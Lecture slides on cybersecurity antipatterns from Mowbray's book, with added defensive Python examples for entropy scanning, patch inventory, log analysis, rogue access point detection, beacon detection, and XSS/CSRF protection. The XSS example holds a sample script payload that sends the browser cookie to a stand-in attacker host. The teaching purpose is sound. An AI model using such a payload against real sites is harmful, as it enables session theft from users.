
Cyber Network Security

Concepts
Module-4
Prof. Harsha B. K.

Ref: Thomas J. Mowbray, “Cyber Security – Managing Systems, Conducting Testing, and Investigating Intrusions”, Wiley.
Contents
• Antipattern problem
• Refactored solution
• Cybersecurity antipattern catalog
Why start with Antipatterns
• The first step is to admit we have a problem
• Solving cybersecurity issues requires
• radical new ways of thinking,
• paradoxically, a return to first principles
• common sense
• “Technology is not the problem…people are the problem”
Security Architecture
• The cybersecurity crisis is a fundamental failure of
architecture
• The majority of deployed software creates significant
opportunities for malicious exploitation
• Properly engineered infrastructure and software
technologies withstand known risks and manage unknown ones
Antipattern: Signature-Based Malware Detection versus Polymorphic Threats
• Conventional wisdom: all systems with up-to-date antivirus
signatures are safe
• Are current signature-based antivirus engines still effective? A signature
matches a fixed byte pattern, so polymorphic malware that re-encodes itself
on every copy evades it until a new signature is written and distributed
• Malicious signature growth: the number of unique malware samples, and
therefore of signatures to maintain, keeps climbing
• Malware variability has grown so rapidly that signature-
based detection is rapidly becoming obsolete
Refactored Solution: Reputational-, Behavioral-, and Entropy-Based Malware Detection
• Symantec: reputation-based signatures
• FireEye: behavioral Intrusion Detection System (IDS)
• Entropy-based: mathematical similarity to known malware; packed or
encrypted payloads have near-maximal byte entropy, which a fixed
signature cannot capture but a measurement can
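As an added example (not from the slides or from Mowbray’s book), the measurement behind entropy-based detection: Shannon entropy in bits per byte, computed over fixed-size blocks rather than over the whole file. The 7.2 bits/byte threshold, the 1024-byte block size and the sample buffers are assumptions chosen for illustration; real packers and encrypted sections approach 8.0, while natural-language text sits around 4 to 5.

```python
import math
import random
from collections import Counter

# Assumed threshold: compressed, packed or encrypted data approaches the 8.0 bits/byte
# maximum; natural-language text and most code sit well below it.
HIGH_ENTROPY_BITS = 7.2


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def scan_blocks(data: bytes, block_size: int = 1024, threshold: float = HIGH_ENTROPY_BITS):
    """Entropy per fixed-size block as (offset, bits_per_byte, flagged) tuples.

    Scanning in blocks matters: a small encrypted payload appended to a large
    benign file barely moves the file-level figure, but lights up its own block.
    """
    results = []
    for offset in range(0, len(data), block_size):
        h = shannon_entropy(data[offset:offset + block_size])
        results.append((offset, round(h, 3), h >= threshold))
    return results


def suspicious_fraction(data: bytes, **kwargs) -> float:
    """Share of blocks at or above the threshold; a triage score, not a verdict."""
    blocks = scan_blocks(data, **kwargs)
    return sum(1 for _, _, flagged in blocks if flagged) / len(blocks) if blocks else 0.0


# Constructed sample buffers (no real malware involved).
TEXT = (b"The quick brown fox jumps over the lazy dog. " * 40)[:1024]   # ~4.4 bits/byte
ZEROS = bytes(1024)                                                      # 0.0 bits/byte
seeded = random.Random(1)                                                # deterministic stand-in
PACKED = bytes(seeded.getrandbits(8) for _ in range(2048))               # for a packed/encrypted section
SAMPLE_FILE = TEXT + PACKED + ZEROS                                      # benign header, hidden payload, padding

if __name__ == "__main__":
    for offset, bits, flagged in scan_blocks(SAMPLE_FILE):
        print(f"offset {offset:5d}: {bits:5.3f} bits/byte {'<-- high entropy' if flagged else ''}")
    print(f"suspicious fraction: {suspicious_fraction(SAMPLE_FILE):.2f}")
```

Entropy alone also flags legitimately compressed content (archives, images, signed installers), so in practice the score is one input beside reputation and behaviour, which is why the slide lists three techniques rather than one.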
Antipattern: Document-Driven Certification and Accreditation
• Assessment and Authorization (A&A) is the newer name for
Certification and Accreditation (C&A)
• A&A is the process of assuring the information security of
systems before they are deployed
• Certification is the assessment and testing phase
• Accreditation is the executive approval process; the antipattern is
treating the resulting documents, rather than the tested system, as the deliverable
Antipattern: Proliferating IA Standards with No Proven Benefits
• NIST is a U.S. government organization with dozens of IT security publications
• NIST SP 800-39: defines integrated enterprise-wide risk management
processes across entire portfolios of systems and business activities
• NIST SP 800-37: defines the process for lifecycle risk management (the Risk
Management Framework)
• NIST SP 800-30: defines how to conduct a risk assessment for a single system
• NIST SP 800-53: contains the standard catalog of security controls; these
controls are requirements that address all aspects of information security
• NIST SP 800-53A: defines how to assess the SP 800-53 controls, with examine,
interview, and test procedures (it does not tell you how to implement them)
Global Information Grid Policy Landscape (figure not reproduced)
Antipattern: Policy-Driven Security Certifications Do Not Address the Threat
• The gold standard of professional security certifications is the
Certified Information Systems Security Professional (CISSP)
• An entirely paper-based qualification, requiring a great deal of
memorization across 10 diverse security domains, for example:
• physical security
• communications security
• systems security
• This paradox (a certification that tests recall rather than the ability to
counter actual threats) was addressed by the Center for Strategic and International
Studies (CSIS), which released a Presidential Commission report on the shortage
of hands-on cybersecurity skills
Refactored Solution: Security Training Roadmap
• One approach is professional training in hands-on skills, offered by the
SANS Institute and a handful of other places, along specialist tracks such as:
• Network Device Specialist
• Operating System Security Specialist
• Database Security Specialist
• System Forensics Specialist
• Reverse Engineering Malware Specialist
Antipatterns Concept
Forces in Cyber Antipatterns
• Functionality
• Confidentiality
• Integrity
• Availability
Cyber Antipattern Templates
Two templates
• Micro-antipattern template
• Full cyber antipattern template
Micro-Antipattern Templates
Components of Micro-Antipattern Templates
• Name
• Antipattern Problem
• Refactored Solution
Full Cyber Antipattern Template
Heading fields
• Antipattern Name
• Also Known As
• Refactored Solution Names
• Unbalanced Primal Forces
• Anecdotal Evidence
Body fields
• Background
• Antipattern Solution
• Causes, Symptoms, and Consequences
• Known Exceptions
• Refactored Solution and Examples
• Related Solutions
Cybersecurity Antipattern Catalog
Common cyber mistakes and bad security habits, catalogued as the prevalent antipatterns:
1. Can’t Patch Dumb
2. Unpatched Applications
3. Never Read the Logs
4. Networks Always Play by the Rules
5. Hard on the Outside, Gooey in the Middle
6. Webify Everything
7. No Time for Security
Can’t Patch Dumb
• Antipattern Name : Can’t Patch Dumb
• Also Known As : Social Engineering, Phishing, Spam, Spyware,
Drive-by Malware, Ransomware, Autoplay Attacks
• Refactored Solution Names : Security Awareness
• Unbalanced Primal Forces : Confidentiality (for example,
divulging private information), integrity (for example, rootkits)
• Anecdotal Evidence : “Technology is not the problem; people
are the problem,” and “Technology is easy; people are difficult.”
Can’t Patch Dumb
Antipattern Solution
• The end user’s lack of security awareness
• The spyware problem
• Malicious websites offering “free” antivirus solutions
• Autoplay infections from USB
Causes & Consequences
• Lack of a recurring security awareness training program
• Lack of test assessment
Can’t Patch Dumb
Refactored Solution & Examples
• Mandatory security awareness training
• Annual refresher courses
• Articulation of the organization’s policies
• Online training program
Related Solutions
• Website advisors
• Using Google
• Web browser script-enabling controls
Unpatched Applications
• Antipattern Name: Unpatched Applications
• Also Known As: Vendor-Specific Updates, Default
Configuration
• Refactored Solution Names: Patch Management
• Unbalanced Primal Forces: Management of integrity
• Anecdotal Evidence: “Most new attacks are going after
the applications, not the operating systems.”
Unpatched Applications
Antipattern Solution
• Unpatched applications are one of the biggest security risks
• Add-on applications such as QuickTime
• Vendors release patches for the problems at the same time that
the defects are announced
Causes & Consequences
• Automatic update disabled on any application where it’s available
• Never visiting vendor websites for updates
• No inventory of applications and vendors
• No update maintenance schedule
• Not reviewing the US-CERT bulletins
• No governance of application versions
Unpatched Applications
Known Exceptions
• If software product support has expired, no further patches will be issued
• Migration to a supported version is strongly recommended
Refactored Solution & Examples
• Inventory of systems and installed software packages
• Maintain a list of approved standard versions of all software
applications
• Enable automatic updates on Windows
Unpatched Applications
Related Solutions
• Data center provisioning environments that assure patch
management and policy configurations
• With locked-down standard system images, data centers are
able to deploy virtual servers that conform to security
baselines and to perform mass updates
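The refactored solution above boils down to two lists and a comparison: what is installed, and what the approved standard version is. As an added example (not from the slides or the book), a minimal drift check over a constructed inventory; the product names, versions and hosts are made up, and `None` in the approved list is an assumed convention for the “support has expired” known exception, which must be migrated rather than patched.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed approved-standard list: product -> minimum approved version.
# None marks a product whose vendor support has ended (the slide's known exception):
# no patch can fix it, so it must be removed or migrated rather than updated.
APPROVED: Dict[str, Optional[str]] = {
    "QuickTime": None,
    "Adobe Reader": "23.6.20320",
    "Java": "8.0.381",
    "Firefox": "117.0",
}

# Constructed host inventory: (host, product, installed version).
INVENTORY: List[Tuple[str, str, str]] = [
    ("ws-01", "Adobe Reader", "23.6.20320"),
    ("ws-01", "Java", "8.0.202"),
    ("ws-02", "QuickTime", "7.7.9"),
    ("ws-02", "Firefox", "118.0.1"),
    ("ws-03", "7-Zip", "22.01"),
]


@dataclass(frozen=True)
class Finding:
    host: str
    product: str
    installed: str
    approved: Optional[str]
    status: str  # "ok" | "outdated" | "unsupported" | "unapproved"


def parse_version(version: str) -> Tuple[int, ...]:
    """Numeric components only, so '8.0.381' > '8.0.202' and '118.0.1' > '117.0'."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def assess(inventory, approved=APPROVED) -> List[Finding]:
    """Compare every installed package against the approved-standard list."""
    findings = []
    for host, product, installed in inventory:
        if product not in approved:
            status, reference = "unapproved", None       # not on the standard list at all
        elif approved[product] is None:
            status, reference = "unsupported", None      # support expired: migrate, don't patch
        elif parse_version(installed) < parse_version(approved[product]):
            status, reference = "outdated", approved[product]
        else:
            status, reference = "ok", approved[product]
        findings.append(Finding(host, product, installed, reference, status))
    return findings


def needs_action(findings: List[Finding]) -> List[Finding]:
    """Everything that is not 'ok' goes on the update maintenance schedule."""
    return [f for f in findings if f.status != "ok"]


if __name__ == "__main__":
    for f in needs_action(assess(INVENTORY)):
        print(f"{f.host:6} {f.product:14} installed={f.installed:12} approved={f.approved} -> {f.status}")
```

The three non-ok statuses map onto the causes listed on the previous slide: “unapproved” is the missing governance of application versions, “outdated” is the disabled automatic update, and “unsupported” is the known exception that no update schedule can solve.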
Never Read the Logs
• Antipattern Name: Never Read the Logs
• Also Known As: Guys Watching Big Network Displays Miss
Everything, Insider Threat, Advanced Persistent Threat (APT),
Network Operations Center (NOC)
• Refactored Solution Names: Advanced Log Analysis
• Unbalanced Primal Forces: Management of confidentiality
• Anecdotal Evidence: Nick Leeson at Barings Bank, Wikileaks,
Aurora Cyber Intrusions
Never Read the Logs
Antipattern Solution
• Network operations centers
• Alerting rules tuned to eliminate false-positive alarms
• Disabled IDS alerting rules introduce vulnerabilities
Causes & Consequences
• Nobody responsible for reading network, system, and security logs
• No health and status monitoring of syslog events
• No alarm rules for Windows configurations
• New IDS yields numerous alerts
• Many IDS rules disabled
Never Read the Logs
Refactored Solution and Examples
• Reading the logs is an essential periodic activity
• Depending on the criticality of the applications, it might be necessary to
review the logs daily or multiple times throughout the day
• Review the system security event logs, system logs, network device logs,
and IDS/IPS logs regularly
• Do not depend solely on the copies held in the centralized log manager; an
intruder who has reached a host can alter or stop its forwarding, so check the
originals on the source systems as well
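As an added example (not from the slides or the book), two of the checks a log review would automate: a failed-login burst from one source address, and a host whose syslog stream has gone quiet, which is the “health and status monitoring of syslog events” the previous slide says is usually missing. The log lines, hosts, addresses, thresholds, the assumed year (BSD syslog stamps carry none) and the review time are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed RFC 3164-style syslog lines (hosts, users and addresses are made up).
LOG_LINES = [
    "Mar 12 10:00:00 db01 postgres[911]: LOG:  checkpoint complete",
    "Mar 12 10:00:01 web01 sshd[2001]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2",
    "Mar 12 10:00:02 web01 sshd[2001]: Failed password for invalid user admin from 203.0.113.7 port 51023 ssh2",
    "Mar 12 10:00:03 web01 sshd[2002]: Failed password for root from 203.0.113.7 port 51024 ssh2",
    "Mar 12 10:00:04 web01 sshd[2002]: Failed password for root from 203.0.113.7 port 51025 ssh2",
    "Mar 12 10:00:06 web01 sshd[2003]: Failed password for oracle from 203.0.113.7 port 51026 ssh2",
    "Mar 12 10:00:09 web01 sshd[2003]: Failed password for oracle from 203.0.113.7 port 51027 ssh2",
    "Mar 12 10:00:11 web01 sshd[2004]: Failed password for alice from 198.51.100.5 port 40010 ssh2",
    "Mar 12 10:00:15 web01 sshd[2004]: Accepted publickey for alice from 198.51.100.5 port 40010 ssh2",
    "Mar 12 10:02:00 db01 postgres[911]: LOG:  checkpoint starting: time",
    "Mar 12 10:25:00 web01 CRON[2100]: (root) CMD (/usr/lib/backup.sh)",
]

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<proc>[\w./-]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

LOG_YEAR = 2024                               # assumed: BSD syslog timestamps carry no year
REVIEW_TIME = datetime(2024, 3, 12, 10, 30)   # assumed moment the analyst runs the review


def parse_all(lines: List[str]) -> List[dict]:
    """Split each syslog line into timestamp, host, process and message."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # in production, count unparseable lines instead of dropping them silently
        ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "host": m["host"], "proc": m["proc"], "msg": m["msg"]})
    return events


def failed_login_bursts(events, threshold=5, window=timedelta(seconds=60)) -> Dict[str, int]:
    """Source IPs with at least `threshold` failed SSH logins inside any sliding `window`."""
    per_ip = defaultdict(list)
    for ev in events:
        m = FAILED_RE.search(ev["msg"])
        if m:
            per_ip[m["ip"]].append(ev["ts"])
    alerts = {}
    for ip, times in per_ip.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:   # slide the window start forward
                lo += 1
            count = hi - lo + 1
            if count >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts


def silent_hosts(events, now=REVIEW_TIME, max_idle=timedelta(minutes=10)) -> List[str]:
    """Hosts whose newest event is older than `max_idle`: a stopped forwarder is itself an alert."""
    last_seen = {}
    for ev in events:
        last_seen[ev["host"]] = max(last_seen.get(ev["host"], ev["ts"]), ev["ts"])
    return sorted(host for host, ts in last_seen.items() if now - ts > max_idle)


if __name__ == "__main__":
    events = parse_all(LOG_LINES)
    print("failed-login bursts:", failed_login_bursts(events))
    print("silent hosts:", silent_hosts(events))
```

The second check is the one most shops skip: a central log manager that simply stops receiving from a host raises nothing unless someone asks “who should have spoken by now?”, which is exactly the gap the slide’s last bullet points at.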
Networks Always Play by the Rules
• Antipattern Name: Networks Always Play by the Rules
• Also Known As: Trust All Servers, Trust All Clients, Do You Believe in
Magic?
• Refactored Solution Names: System Hardening, State-of-the-Art
Wireless Security Protocols
• Unbalanced Primal Forces: Management of confidentiality and
integrity
• Anecdotal Evidence: In wireless, the access point with the strongest
signal is the one that user devices will trust, even if it’s malicious.
Networks Always Play by the Rules
Antipattern Solution
• The Internet was not designed with security in mind
• Karma, a free security tool (it answers clients’ Wi-Fi probe requests so
that they associate with the attacker’s access point)
• Yersinia, a security research tool that generates network layer 2 attacks
Causes & Consequences
• Lack of server authentication (HTTP, Wi-Fi, GSM, DNS, SMTP)
• Lack of client authentication (HTTP, HTTPS)
• Not monitoring networks for malformed protocols and packets
Networks Always Play by the Rules
Refactored Solution & Examples
• The inherent weaknesses of the Internet must be compensated for, not assumed away
• Use cybersecurity best practices
• Wi-Fi-enabled laptops to require host authentication
Related Solutions
• A fundamental rethinking of the Internet with much stronger support for
delegation of trust and attribution of user actions
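The anecdote on the heading slide, that a client trusts whichever access point is loudest, is also what makes a rogue access point detectable from the client or a wireless sensor: the SSID is right but the BSSID and the security type are not. As an added example (not from the slides or the book), a scan-result classifier against a known-good access point inventory; SSIDs, BSSIDs, signal strengths and the security labels are constructed for this illustration.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    security: str   # assumed labels: "OPEN", "WPA2-PSK", "WPA2-EAP"
    rssi_dbm: int   # higher (less negative) is a stronger signal
    channel: int


# Constructed corporate inventory: the SSID must only be served by these BSSIDs
# and must always require per-user (EAP) authentication of the infrastructure.
KNOWN_APS: Dict[str, dict] = {
    "CorpWiFi": {"security": "WPA2-EAP", "bssids": {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}},
}

# Constructed scan results from a laptop or sensor in the lobby.
OBSERVED: List[Beacon] = [
    Beacon("CorpWiFi", "00:11:22:aa:bb:01", "WPA2-EAP", -67, 6),
    Beacon("CorpWiFi", "00:11:22:aa:bb:02", "WPA2-EAP", -72, 11),
    Beacon("CorpWiFi", "de:ad:be:ef:00:01", "OPEN", -41, 6),      # loudest, unknown radio, no auth
    Beacon("Guest", "00:11:22:aa:bb:10", "OPEN", -70, 1),
    Beacon("CorpWiFi", "de:ad:be:ef:00:02", "WPA2-PSK", -55, 1),  # downgraded to a shared key
]


def classify(beacon: Beacon, known=KNOWN_APS) -> str:
    """'trusted', 'unknown-ssid', or 'rogue:<reason,...>' for a single beacon."""
    profile = known.get(beacon.ssid)
    if profile is None:
        return "unknown-ssid"
    reasons = []
    if beacon.bssid.lower() not in profile["bssids"]:
        reasons.append("unknown-bssid")
    if beacon.security != profile["security"]:
        reasons.append(f"security-mismatch:{beacon.security}")
    return "rogue:" + ",".join(reasons) if reasons else "trusted"


def rogue_report(observed: List[Beacon], known=KNOWN_APS) -> List[Tuple[str, str, int, str]]:
    """Rogue candidates, strongest signal first: the order in which a naive client would pick them."""
    ranked = sorted(observed, key=lambda b: b.rssi_dbm, reverse=True)
    report = []
    for b in ranked:
        verdict = classify(b, known)
        if verdict.startswith("rogue"):
            report.append((b.ssid, b.bssid, b.rssi_dbm, verdict))
    return report


def strongest_is_rogue(observed: List[Beacon], ssid: str, known=KNOWN_APS) -> bool:
    """True when the beacon a signal-strength-driven client would join is not one of ours."""
    candidates = [b for b in observed if b.ssid == ssid]
    if not candidates:
        return False
    return classify(max(candidates, key=lambda b: b.rssi_dbm), known).startswith("rogue")


if __name__ == "__main__":
    for row in rogue_report(OBSERVED):
        print(row)
    print("client would join a rogue CorpWiFi:", strongest_is_rogue(OBSERVED, "CorpWiFi"))
```

The classifier is the monitoring side; the “require host authentication” bullet is the prevention side, where the client profile validates the RADIUS server certificate before sending credentials, so even the loudest impostor gets nothing useful.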
Hard on the Outside, Gooey in the Middle
• Antipattern Name: Hard on the Outside, Gooey in the Middle
• Also Known As: Tootsie Pop, Defense in Depth, Perimeter
Security, Protect Everything from All Threats
• Refactored Solution Names: HBSS, Network Enclaves
• Unbalanced Primal Forces: Management of confidentiality
• Anecdotal Evidence: “Each user’s browser is sending
thousands of spyware beacons every day!”; Advanced Persistent
Threat; “Our networks are totally secure; we have a firewall.”
Hard on the Outside, Gooey in the Middle
Antipattern Solution
• Internet boundary DMZ
• The data center storage SAN
• Intranet
• In theory, firewalls protect the network by hiding the internal IP addresses
• The outgoing ports are open on virtually all firewalls
• Malware and spyware writers are well aware of this fact, and craft
their code to take advantage of these ubiquitously open ports
• To the firewall, these packets appear to be ordinary web traffic
Hard on the Outside, Gooey in the Middle
Causes & Consequences
• No protected network enclaves inside the firewall on the intranet
• No HBSS
• No configuration monitoring
• Other cyber antipatterns such as Never Read the Logs
Refactored Solution & Examples
• Intranet security should be carefully designed
• The most critical information assets deserve additional protection
• State-of-the-art security solutions (configuration monitoring)
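The beacons quoted as anecdotal evidence above look like ordinary web traffic to a port-based firewall, but not to anyone looking at timing: a timer-driven implant connects at a regular interval, a person does not. As an added example (not from the slides or the book), a beacon detector over constructed outbound flow records; the addresses, the 5-minute period, and the `min_count` and `max_cv` tuning values are assumptions for this illustration.

```python
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, Iterable, Tuple

Flow = Tuple[int, str, str, int]   # (epoch seconds, source IP, destination IP, destination port)


def beacon_candidates(flows: Iterable[Flow], min_count: int = 8, max_cv: float = 0.1) -> Dict[tuple, dict]:
    """Flag (src, dst, dport) tuples whose connection timing is too regular to be a human.

    cv is the coefficient of variation (standard deviation / mean) of the gaps between
    successive connections: near 0 for a timer-driven beacon, around 1 or more for
    interactive browsing. min_count and max_cv are assumed tuning values.
    """
    times = defaultdict(list)
    for ts, src, dst, dport in flows:
        times[(src, dst, dport)].append(ts)
    found = {}
    for key, ts_list in times.items():
        if len(ts_list) < min_count:      # too few samples to judge regularity
            continue
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        period = mean(gaps)
        if period <= 0:
            continue
        cv = pstdev(gaps) / period
        if cv <= max_cv:
            found[key] = {"count": len(ts_list), "period_s": round(period, 1), "cv": round(cv, 4)}
    return found


# Constructed flow records (no real hosts). Everything is outbound TCP/443, which the
# perimeter firewall allows, so a port-based rule sees nothing unusual in any of it.
BASE = 1_700_000_000
BEACON_FLOWS = [(BASE + 300 * i + (i % 3) - 1, "10.0.5.7", "203.0.113.50", 443) for i in range(12)]   # 5 min timer, 1 s jitter
BROWSING_FLOWS = [(BASE + t, "10.0.5.7", "198.51.100.20", 443) for t in (3, 17, 19, 85, 260, 264, 900, 901, 1402, 2000)]
SPARSE_FLOWS = [(BASE + t, "10.0.5.8", "203.0.113.50", 443) for t in (10, 310, 610)]   # regular but too few
ALL_FLOWS = BEACON_FLOWS + BROWSING_FLOWS + SPARSE_FLOWS

if __name__ == "__main__":
    for key, stats in beacon_candidates(ALL_FLOWS).items():
        print(key, stats)
```

Real implants add deliberate jitter to blunt exactly this check, which is why the cut-off is a tunable and why the result is a candidate list for an analyst rather than a block rule; it is still far more than the firewall offers, since to the firewall every one of these flows was legitimate HTTPS.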
Webify Everything
• Antipattern Name: Webify Everything
• Also Known As: Cross-site scripting, Cross-site Request Forgery, US
Power Grid on Internet, Global Financial System on Internet
• Refactored Solution Names: Physical Separation, Out of Band
Separation
• Unbalanced Primal Forces: Management of integrity and availability
• Anecdotal Evidence: “Why the hell would they put the electrical
power grid on the Internet?”
Webify Everything
Background
• Computer technology’s crawl-walk-run evolution: it is very trendy to
eliminate installed applications entirely and rely on web-based
interfaces for everything
• All the headaches of managing applications are conveniently
delegated to some remote entity providing software as a service
Antipattern Solution
• Defies common sense when it proliferates web interfaces for critical
infrastructure
• The problem is compounded by the common malware technique called
cross-site scripting (XSS)
Webify Everything
Causes & Consequences
• Web browsers are the user interface platform for applications, called thin clients
• Used ubiquitously, and convenient for system administrators: there is no
client software installation and no client software updates
• Users are in the habit of opening multiple browser tabs and connecting with
multiple websites
• Websites with malicious content are a significant and prevalent threat.
Malicious content can be embedded in the site itself or arrive through
advertisements supplied by third parties
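The two attack names listed under Also Known As for this antipattern both come from the browser habit described above: the same browser that holds a session to the critical web interface is also rendering untrusted pages. As an added example (not from the slides or the book), the vulnerable rendering of user-supplied text beside its encoded form, and a synchronizer-token CSRF check on a state-changing request; the handler, the form fields and the payload are constructed for this illustration and use only the Python standard library.

```python
import html
import hmac
import secrets
from typing import Tuple


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates untrusted input straight into HTML: stored/reflected XSS."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """HTML-encodes for the body-text context; quote=True also covers attribute values."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


# CSRF: a per-session secret the browser can only obtain from our own page. A form
# auto-submitted from another tab carries the victim's cookies but cannot read this token.
def issue_csrf_token(session: dict) -> str:
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: dict, submitted) -> bool:
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)   # constant-time comparison


def handle_transfer(session: dict, form: dict) -> Tuple[int, str]:
    """Toy state-changing handler (hypothetical): refuses any request without a valid token."""
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "CSRF check failed"
    return 200, f"transferred {form['amount']} to {form['to']}"


# Constructed XSS payload: exfiltrates the session cookie to an attacker-controlled host.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    session = {}
    token = issue_csrf_token(session)
    print(handle_transfer(session, {"amount": "100", "to": "acct-9", "csrf_token": token}))
    print(handle_transfer(session, {"amount": "100", "to": "acct-9"}))   # cross-site form: no token
```

Encoding is context-specific: `html.escape` is right for HTML body and attribute text, but output landing inside a script block or a URL needs that context’s encoding instead. The token check must live on every state-changing endpoint, not just the visible forms, or the attacker simply picks the endpoint that forgot.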
Webify Everything
Refactored Solution & Examples
• Software VPNs provide out-of-band separation of communications across
public networks, meaning that interception of packets using technologies
like network sniffers is essentially prevented
Related Solutions
• Using a dedicated, physically separate computer for all financial
transactions
• Much less likely to be compromised by malware
No Time for Security
• Antipattern Name: No Time for Security
• Also Known As: Add Security Last, Blame Security for Schedule
Slippage, Deliver It Now!
• Refactored Solution Names: Security Requirements Are Real
Requirements, Cyber Risk Management
• Unbalanced Primal Forces: Management of confidentiality,
integrity, and availability
• Anecdotal Evidence: “Wait until it’s time to test the system, and
then worry about security.”
No Time for Security
Background
• Security is usually the final consideration in the development of a system
• Sometimes security is left out altogether in the rush to get products out
the door
Antipattern Solution
• Developers of software projects, and now also widget developers
• The release process will test for security vulnerabilities
• When confronted, developers can claim ignorance; they are not security
experts, after all
No Time for Security
Causes & Consequences
• Security was never part of the requirements
• Saving on development costs and time at the expense of security
• Project is behind schedule
• Shared administrator accounts
• Not training the developers to be security aware
Known Exceptions
• If the software is out-of-the-box, it is already near the end of the
development cycle
• It can be configured for security just prior to deployment
• However, you are taking it on faith that the original software developers
accounted for security and built in appropriate configuration settings
No Time for Security
Refactored Solution & Examples
• Security risks and requirements should be analyzed early in the
development cycle, at the same time as functional requirements
• Stakeholders should categorize the system, for example: confidentiality
high, integrity medium, and availability medium
Related Solutions
• Select security and audit controls using the Committee of Sponsoring
Organizations (COSO) and Control Objectives for Information and Related
Technology (COBIT) frameworks for commercial systems and to satisfy
Sarbanes-Oxley requirements
